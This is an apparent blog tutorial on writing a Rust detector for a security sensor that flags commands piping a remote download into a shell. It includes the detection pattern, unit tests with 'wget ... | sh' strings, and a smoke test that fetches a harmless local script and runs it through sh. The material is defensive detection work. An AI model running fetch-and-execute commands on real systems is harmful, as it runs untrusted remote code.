Skip to content
← Back to blog
Tutorial

Your First Inner Warden Detector in 50 Lines

April 24, 2026·9 min read

Pick something small and obvious

The fastest way to learn the sensor is to write a detector that fires on something you can reproduce in a shell. We will catch the classic wget | sh pattern: a process pipes a remote download straight into a shell. It is loud, common in real intrusions, and easy to trigger from your own keyboard.

The full detector fits in about 50 lines of Rust. By the end you will know where it lives, how to register it, how to test it, and how to validate it against the replay corpus.

Where detectors live

Sensor detectors sit under crates/sensor/src/detectors/. Each detector is a module that implements the same trait, consumes events from the collectors, and emits findings into the JSONL stream the agent reads.

The trait is intentionally small. You get an event reference, you decide whether the event is interesting, and if it is you return a Finding with a stable id, a severity, and a small bag of fields the agent can read.

The detector

Create crates/sensor/src/detectors/wget_pipe_sh.rs with this content:

use crate::detectors::{Detector, Finding, Severity};
use crate::events::ProcessEvent;

pub struct WgetPipeSh;

impl Detector for WgetPipeSh {
    fn id(&self) -> &'static str {
        "exec.wget_pipe_sh"
    }

    fn on_process(&self, ev: &ProcessEvent) -> Option<Finding> {
        let cmd = ev.cmdline.as_deref()?;
        let lower = cmd.to_ascii_lowercase();
        let downloader = lower.contains("wget ")
            || lower.contains("curl ");
        let pipe_to_shell = lower.contains("| sh")
            || lower.contains("| bash")
            || lower.contains("|sh");

        if downloader && pipe_to_shell {
            return Some(Finding {
                detector: self.id(),
                severity: Severity::High,
                pid: ev.pid,
                comm: ev.comm.clone(),
                fields: vec![
                    ("cmdline".into(), cmd.into()),
                    ("technique".into(), "T1059.004".into()),
                ],
            });
        }
        None
    }
}

Two checks, one allocation, no IO. That is the shape every good detector should aim for. The kernel side already paid for the expensive part by giving us the cmdline.

Register it

Open crates/sensor/src/detectors/mod.rs, add the module declaration, and push an instance into the registry that the runtime walks for every event:

mod wget_pipe_sh;
pub use wget_pipe_sh::WgetPipeSh;

pub fn builtin_detectors() -> Vec<Box<dyn Detector + Send + Sync>> {
    vec![
        // ... existing detectors ...
        Box::new(WgetPipeSh),
    ]
}

That is the entire wiring. No config file, no plugin loader, no dynamic dispatch beyond the trait object. The detector ships with the binary.

Write a unit test

Add a #[cfg(test)] block at the bottom of the file. Hand-build a ProcessEvent, feed it through, and assert. The whole point of keeping detectors pure functions of an event is that tests stay trivial.

#[cfg(test)]
mod tests {
    use super::*;

    fn ev(cmd: &str) -> ProcessEvent {
        ProcessEvent {
            pid: 1234,
            comm: "sh".into(),
            cmdline: Some(cmd.into()),
            ..Default::default()
        }
    }

    #[test]
    fn fires_on_wget_pipe_sh() {
        let f = WgetPipeSh.on_process(&ev("wget -qO- http://x | sh"));
        assert!(f.is_some());
    }

    #[test]
    fn ignores_plain_wget() {
        let f = WgetPipeSh.on_process(&ev("wget http://x -O /tmp/y"));
        assert!(f.is_none());
    }
}

Run cargo test -p sensor wget_pipe_sh from the repo root. Both tests should pass in a few hundred milliseconds.

Validate against the replay corpus

Unit tests prove the function is correct on synthetic input. Replay proves it survives real traces without firing on normal traffic. The repo ships a bag of recorded sessions under qa/replay/. Run them all with:

make replay-qa

The harness re-feeds each trace through the full sensor pipeline and diffs the findings against a golden file. If your new detector fires on something benign, the diff will fail loud and you will know exactly which trace caused it. Add a new trace under qa/replay/wget_pipe_sh/ with a short README that says what the trace contains and what should fire.

Trigger it on a live host

On a test box with the sensor running, the easiest smoke test is also the most embarrassing one:

echo 'echo hello from a fake payload' > /tmp/p.sh
python3 -m http.server 8080 &
wget -qO- http://127.0.0.1:8080/tmp/p.sh | sh

Watch /var/lib/innerwarden/findings.jsonl. You should see a exec.wget_pipe_sh entry within a few hundred milliseconds, with the cmdline and the MITRE technique attached. If you do not, run the agent in the foreground with RUST_LOG=debug and look for the detector being skipped.

What to do next

Real detectors usually go beyond a single substring match. You add a denylist of allowed parents, you fold in network context (was the URL DNS-resolved a moment ago?), and you graduate the finding into a kill chain pattern so the agent can correlate it with later events.

The mechanics never change. New file, register it, unit test, replay-qa, ship.

Read more: Sigma rules over eBPF on Linux · Inner Warden architecture tour